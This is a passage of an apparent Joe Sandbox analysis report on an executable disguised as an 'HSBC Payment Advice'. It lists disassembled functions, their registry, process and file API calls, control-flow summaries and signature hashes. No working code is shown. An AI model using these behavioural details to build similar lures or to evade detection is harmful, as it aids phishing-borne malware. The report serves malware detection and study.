          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CountFileNameTempTick
          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
          • API String ID: 1716503409-944333549
          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
          • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
          • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
          Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 651 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 658 4029c5-4029d4 651->658 659 40237b-402383 651->659 660 402385-402392 call 402b38 lstrlenW 659->660 661 402396-402399 659->661 660->661 664 4023a9-4023ac 661->664 665 40239b-4023a8 call 402b1b 661->665 669 4023bd-4023d1 RegSetValueExW 664->669 670 4023ae-4023b8 call 403060 664->670 665->664 673 4023d3 669->673 674 4023d6-4024b0 RegCloseKey 669->674 670->669 673->674 674->658 676 402791-402798 674->676 676->658
          APIs
          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
          • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
          • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
          • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseCreateValuelstrlen
          • String ID:
          • API String ID: 1356686001-0
          • Opcode ID: 3d1039a2ea90bcf073f2e723334542c8609e3331be1057863197d0e9620388c6
          • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
          • Opcode Fuzzy Hash: 3d1039a2ea90bcf073f2e723334542c8609e3331be1057863197d0e9620388c6
          • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 677 401e51-401e62 call 402b38 call 405192 call 405663 683 401e67-401e6c 677->683 684 402791-402798 683->684 685 401e72-401e75 683->685 686 4029c5-4029d4 684->686 687 401ec6-401ecf CloseHandle 685->687 688 401e77-401e87 WaitForSingleObject 685->688 687->686 690 401e97-401e99 688->690 691 401e89-401e95 call 40628b WaitForSingleObject 690->691 692 401e9b-401eab GetExitCodeProcess 690->692 691->690 694 401eba-401ebd 692->694 695 401ead-401eb8 call 405e2f 692->695 694->687 698 401ebf 694->698 695->687 698->687
          APIs
            • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
            • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
            • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
            • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
            • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
          • String ID:
          • API String ID: 3585118688-0
          • Opcode ID: 86a9737d06a492ba168b449a6a0e56dd891bc5485ac101adf7b243a53387483d
          • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
          • Opcode Fuzzy Hash: 86a9737d06a492ba168b449a6a0e56dd891bc5485ac101adf7b243a53387483d
          • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
          Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
          Download Yara Rule
          APIs
          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
          • CloseHandle.KERNEL32(?), ref: 00405695
          Strings
          • Error launching installer, xrefs: 00405676
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseCreateHandleProcess
          • String ID: Error launching installer
          • API String ID: 3712363035-66219284
          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
          • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
          • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
          Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061DF
            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061F3
            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00406206
          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00403345
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Char$Next$CreateDirectoryPrev
          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
          • API String ID: 4115351271-2414109610
          • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
          • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
          • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
          • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
          Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
          • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
          • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
          • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
          Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
          • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
          • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
          • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
          Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
          • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
          • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
          • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
          Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
          • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
          • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
          • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
          Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
          • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
          • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
          • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
          Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
          • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
          • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
          • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
          Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
          • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
          • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
          • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
          Function 00402452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
          • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
